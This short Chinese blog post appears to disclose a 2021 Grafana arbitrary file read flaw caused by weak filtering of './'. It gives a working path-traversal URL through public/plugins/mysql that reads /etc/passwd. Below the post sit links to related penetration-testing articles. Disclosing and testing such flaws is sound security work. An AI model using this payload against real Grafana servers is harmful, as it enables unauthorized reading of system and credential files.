一品网
  • 首页

2021Grafana任意文件读取POC


因代码中过滤./不严。导致可以跨目录读取文件。
本地环境下漏洞测试POC如下图(测试环境为docker安装的本地环境,图盗自微信网友“早日争取进去”。就是这个名字,我没写错)
漏洞路径:public/plugins/mysql/../../../../../../../../../etc/passwd

漏洞细节渗透测试POCGrafana

相关


PetaPoco连接数据库

渗透测试(一)-Msf生成免杀后门(内网篇)

渗透测试(二)-Metasploit生成免杀后门(外网篇)

渗透测试之billu b0x2

PetaPoco中使用分页方法时遇到用DISTINCT去重时,要注意排序字段的SQL表别名写法。

grafana 监控 kafka 消息参数描述

PetaPoco轻量级ORM框架 - Database API 手册

Grafana SQL汇总

搭建grafana+influxdb+telegraf,以及常见问题

SpringCloud升级之路2020.0.x版-40. spock 单元测试封装的 WebClient(下)

SpringCloud升级之路2020.0.x版-40. spock 单元测试封装的 WebClient(下)

grafana安装

标签

一品网 冀ICP备14022925号-6